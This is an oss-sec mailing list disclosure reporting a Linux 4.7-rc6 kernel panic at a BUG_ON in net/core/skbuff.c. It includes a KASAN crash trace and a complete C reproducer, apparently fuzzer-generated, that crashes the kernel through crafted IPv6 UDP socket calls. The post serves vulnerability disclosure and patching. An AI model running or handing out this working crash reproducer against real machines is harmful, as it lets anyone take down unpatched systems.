oss-sec mailing list archives
BUG_ON crash in linux 4.7-rc6/master skbuff.c
From: Marco Grassi <marco.gra () gmail com>
Date: Tue, 5 Jul 2016 18:36:55 +0800
Hi, this program will crash the linux kernel 4.7-rc6 and current master in a voluntary panic() call triggered at a BUG_ON in net/core/skbuff.c:3051 kernel BUG at net/core/skbuff.c:3051! in a qemu environment with kASAN enabled in a syzkaller-kind setup ---- crash trace ---- [ 59.831394] kernel BUG at net/core/skbuff.c:3051! [ 59.831802] invalid opcode: 0000 [#1] SMP KASAN [ 59.832193] Modules linked in: [ 59.832488] CPU: 0 PID: 1651 Comm: derp2 Not tainted 4.7.0-rc6 #1 [ 59.833022] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 59.833827] task: ffff8800ba26c740 ti: ffff8800b8ba8000 task.ti: ffff8800b8ba8000 [ 59.834498] RIP: 0010:[<ffffffff8292611c>] [<ffffffff8292611c>] skb_pull_rcsum+0x1ec/0x2c0 [ 59.835238] RSP: 0018:ffff88011b007768 EFLAGS: 00010206 [ 59.835705] RAX: ffff8800ba26c740 RBX: ffff880119c338c0 RCX: ffff880119c33940 [ 59.836311] RDX: 0000000000000100 RSI: 0000000000000008 RDI: ffff880119c33940 [ 59.836916] RBP: ffff88011b007798 R08: ffff88011b007700 R09: 0000000000000001 [ 59.837521] R10: 1ffff10017742929 R11: ffff880119c33982 R12: 0000000000000001 [ 59.838141] R13: 0000000000000008 R14: ffff880119c33998 R15: ffff8800b88ce490 [ 59.838767] FS: 0000000002454880(0000) GS:ffff88011b000000(0000) knlGS:0000000000000000 [ 59.839522] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 59.840017] CR2: 0000000020013000 CR3: 00000000b9940000 CR4: 00000000000006f0 [ 59.840631] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 59.841242] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 59.841851] Stack: [ 59.842033] ffff88011b007798 ffff880119c338c0 ffff8800b93d3980 0000000000000000 [ 59.842759] 0000000000000000 ffffffff83a8a200 ffff88011b0077f0 ffffffff82c54dba [ 59.843430] ffff880100000000 0000000000000000 00000001ab123950 ffffffff83a8a200 [ 59.844102] Call Trace: [ 59.844317] <IRQ> [ 59.844495] [<ffffffff82c54dba>] udpv6_queue_rcv_skb+0x4fa/0x15b0 [ 59.845048] [<ffffffff82c56b36>] __udp6_lib_rcv+0xcc6/0x1d20 [ 59.845540] [<ffffffff82c57bb1>] udpv6_rcv+0x21/0x30 [ 59.845975] [<ffffffff82bf5971>] ip6_input_finish+0x3a1/0x1170 [ 59.846510] [<ffffffff82bf7faa>] ip6_input+0xda/0x1f0 [ 59.846950] [<ffffffff82bf7ed0>] ? ipv6_rcv+0x1790/0x1790 [ 59.847418] [<ffffffff8296ce36>] ? __netif_receive_skb+0x36/0x170 [ 59.847944] [<ffffffff8296d024>] ? netif_receive_skb_internal+0xb4/0x210 [ 59.848520] [<ffffffff82bf53ae>] ip6_rcv_finish+0x11e/0x340 [ 59.849002] [<ffffffff82bf74f0>] ipv6_rcv+0xdb0/0x1790 [ 59.849450] [<ffffffff82bf6740>] ? ip6_input_finish+0x1170/0x1170 [ 59.849978] [<ffffffff811fc519>] ? __enqueue_entity+0x139/0x230 [ 59.850517] [<ffffffff81206100>] ? update_curr+0x150/0x4e0 [ 59.850993] [<ffffffff82bf6740>] ? ip6_input_finish+0x1170/0x1170 [ 59.851520] [<ffffffff8296be64>] __netif_receive_skb_core+0x1754/0x26f0 [ 59.852101] [<ffffffff8296a710>] ? netdev_info+0x120/0x120 [ 59.852603] [<ffffffff8120717b>] ? check_preempt_wakeup+0x50b/0xa70 [ 59.853167] [<ffffffff811e6cd4>] ? check_preempt_curr+0x204/0x350 [ 59.853715] [<ffffffff8296ce2f>] __netif_receive_skb+0x2f/0x170 [ 59.854286] [<ffffffff82971037>] process_backlog+0x197/0x580 [ 59.854789] [<ffffffff8296ea99>] net_rx_action+0x7c9/0xcf0 [ 59.855264] [<ffffffff8296e2d0>] ? sk_busy_loop+0xa00/0xa00 [ 59.855760] [<ffffffff822a8c90>] ? __e1000_maybe_stop_tx+0x200/0x200 [ 59.856333] [<ffffffff82d394d3>] ? __do_softirq+0x403/0x585 [ 59.856829] [<ffffffff82d3929e>] __do_softirq+0x1ce/0x585 [ 59.857298] [<ffffffff82d3800c>] do_softirq_own_stack+0x1c/0x30 [ 59.857808] <EOI> [ 59.857983] [<ffffffff81172568>] do_softirq.part.19+0x38/0x40 [ 59.858535] [<ffffffff811725ed>] __local_bh_enable_ip+0x7d/0x80 [ 59.859048] [<ffffffff82be694d>] ip6_finish_output2+0x7dd/0x1510 [ 59.859568] [<ffffffff81c3f920>] ? __do_once_done+0x1a0/0x210 [ 59.860066] [<ffffffff82be6170>] ? dst_output+0x80/0x80 [ 59.860520] [<ffffffff8294d670>] ? skb_flow_dissector_init+0x290/0x290 [ 59.861082] [<ffffffff81c31c40>] ? copy_page_from_iter+0xa20/0xa20 [ 59.861616] [<ffffffff815c85a1>] ? memset+0x31/0x40 [ 59.862042] [<ffffffff82bf29f2>] ip6_finish_output+0x302/0x560 [ 59.862578] [<ffffffff82bf4259>] ? __ip6_make_skb+0x1279/0x1bc0 [ 59.863127] [<ffffffff82bf2da3>] ip6_output+0x153/0x390 [ 59.863582] [<ffffffff82bf2c50>] ? ip6_finish_output+0x560/0x560 [ 59.864100] [<ffffffff82bf2fe0>] ? ip6_output+0x390/0x390 [ 59.864573] [<ffffffff82cc3d57>] ip6_local_out+0x87/0xb0 [ 59.865036] [<ffffffff82bf4c2e>] ip6_send_skb+0x8e/0x1b0 [ 59.865522] [<ffffffff82c4decd>] udp_v6_send_skb+0x60d/0x1120 [ 59.866021] [<ffffffff82c4ec08>] udp_v6_push_pending_frames+0x228/0x340 [ 59.866643] [<ffffffff82c4e9e0>] ? udp_v6_send_skb+0x1120/0x1120 [ 59.867164] [<ffffffff82a50d50>] ? ip_reply_glue_bits+0xb0/0xb0 [ 59.867677] [<ffffffff82c5069e>] udpv6_sendmsg+0x189e/0x22e0 [ 59.868168] [<ffffffff82a50d50>] ? ip_reply_glue_bits+0xb0/0xb0 [ 59.868693] [<ffffffff82c4ee00>] ? udp_v6_flush_pending_frames+0xe0/0xe0 [ 59.869285] [<ffffffff813b3ee2>] ? is_ftrace_trampoline+0xc2/0xf0 [ 59.869814] [<ffffffff8109010a>] ? print_context_stack+0x6a/0xf0 [ 59.870351] [<ffffffff814ce4b0>] ? warn_alloc_failed+0x240/0x240 [ 59.870883] [<ffffffff815c2de4>] ? deactivate_slab+0x134/0x3d0 [ 59.871387] [<ffffffff815c1f93>] ? alloc_debug_processing+0x73/0x1b0 [ 59.871936] [<ffffffff82b387bc>] inet_sendmsg+0x24c/0x350 [ 59.872405] [<ffffffff82b38570>] ? inet_recvmsg+0x3d0/0x3d0 [ 59.872913] [<ffffffff829081ff>] sock_sendmsg+0xcf/0x110 [ 59.873389] [<ffffffff82908462>] sock_write_iter+0x222/0x3c0 [ 59.873879] [<ffffffff82908240>] ? sock_sendmsg+0x110/0x110 [ 59.874394] [<ffffffff82c94c07>] ? ip6_datagram_release_cb+0x1e7/0x260 [ 59.874969] [<ffffffff81c2a6cf>] ? iov_iter_init+0xaf/0x1d0 [ 59.875453] [<ffffffff8161d71b>] __vfs_write+0x3cb/0x640 [ 59.875915] [<ffffffff8161d350>] ? default_llseek+0x2c0/0x2c0 [ 59.876412] [<ffffffff81ac3fd7>] ? apparmor_file_permission+0x27/0x30 [ 59.876969] [<ffffffff8162106a>] ? rw_verify_area+0xea/0x2b0 [ 59.877460] [<ffffffff816216b5>] vfs_write+0x175/0x4a0 [ 59.877907] [<ffffffff81624f18>] SyS_write+0xd8/0x1b0 [ 59.878364] [<ffffffff81624e40>] ? SyS_read+0x1b0/0x1b0 [ 59.878831] [<ffffffff811271c9>] ? trace_do_page_fault+0x79/0x240 [ 59.879362] [<ffffffff82d36476>] entry_SYSCALL_64_fastpath+0x1e/0xa8 [ 59.879907] Code: fc ff df 48 89 fa 48 c1 ea 03 0f b6 04 02 84 c0 74 08 3c 03 0f 8e ba 00 00 00 80 a3 91 00 00 00 f9 e9 4a ff ff ff e8 b4 fe a4 fe <0f> 0b e8 ad fe a4 fe 0f 0b e8 a6 fe a4 fe 31 d2 4c 89 ff 44 89 [ 59.882261] RIP [<ffffffff8292611c>] skb_pull_rcsum+0x1ec/0x2c0 [ 59.882798] RSP <ffff88011b007768> [ 59.883143] ---[ end trace d7d3f86c27f0e339 ]--- [ 59.883546] Kernel panic - not syncing: Fatal exception in interrupt [ 59.884589] Kernel Offset: disabled [ 59.884906] ---[ end Kernel panic - not syncing: Fatal exception in interrupt --- reproducer --- derp2.c ---- gcc derp2.c -o derp2 #include <unistd.h> #include <sys/syscall.h> #include <string.h> #include <stdint.h> #include <pthread.h> #ifndef SYS_mmap #define SYS_mmap 9 #endif #ifndef SYS_socket #define SYS_socket 41 #endif #ifndef SYS_bind #define SYS_bind 49 #endif #ifndef SYS_sendto #define SYS_sendto 44 #endif #ifndef SYS_setsockopt #define SYS_setsockopt 54 #endif #ifndef SYS_dup #define SYS_dup 32 #endif #ifndef SYS_write #define SYS_write 1 #endif long r[22]; int main() { memset(r, -1, sizeof(r)); r[0] = syscall(SYS_mmap, 0x20000000ul, 0x1e000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); r[1] = syscall(SYS_socket, 0xaul, 0x2ul, 0x0ul, 0, 0, 0); memcpy((void*)0x20006000, "\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128); r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0); memcpy((void*)0x20017f5a, "\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\xcc\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1", 166); memcpy((void*)0x200001a2, "\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0", 28); r[6] = syscall(SYS_sendto, r[1], 0x20017f5aul, 0xa6ul, 0x249e4e54fe149d8cul, 0x200001a2ul, 0x1cul); *(uint16_t*)0x2001dff0 = (uint16_t)0x1; *(uint64_t*)0x2001dff8 = (uint64_t)0x2001d000; *(uint16_t*)0x2001d000 = (uint16_t)0x6; *(uint8_t*)0x2001d002 = (uint8_t)0x4e6; *(uint8_t*)0x2001d003 = (uint8_t)0x0; *(uint32_t*)0x2001d004 = (uint32_t)0x1; r[13] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x1aul, 0x2001dff0ul, 0x10ul, 0); r[14] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0); *(uint32_t*)0x20013000 = (uint32_t)0x28; *(uint32_t*)0x20013004 = (uint32_t)0x2; *(uint64_t*)0x20013008 = (uint64_t)0x0; *(uint64_t*)0x20013010 = (uint64_t)0xfffffffffffffff7; *(uint64_t*)0x20013018 = (uint64_t)0x7; *(uint16_t*)0x20013020 = (uint16_t)0x1; r[21] = syscall(SYS_write, r[14], 0x20013000ul, 0x28ul, 0, 0, 0); return 0; } ---- thank you Marco https://marcograss.github.io
Current thread:
- BUG_ON crash in linux 4.7-rc6/master skbuff.c Marco Grassi (Jul 05)
- Re: BUG_ON crash in linux 4.7-rc6/master skbuff.c cve-assign (Jul 05)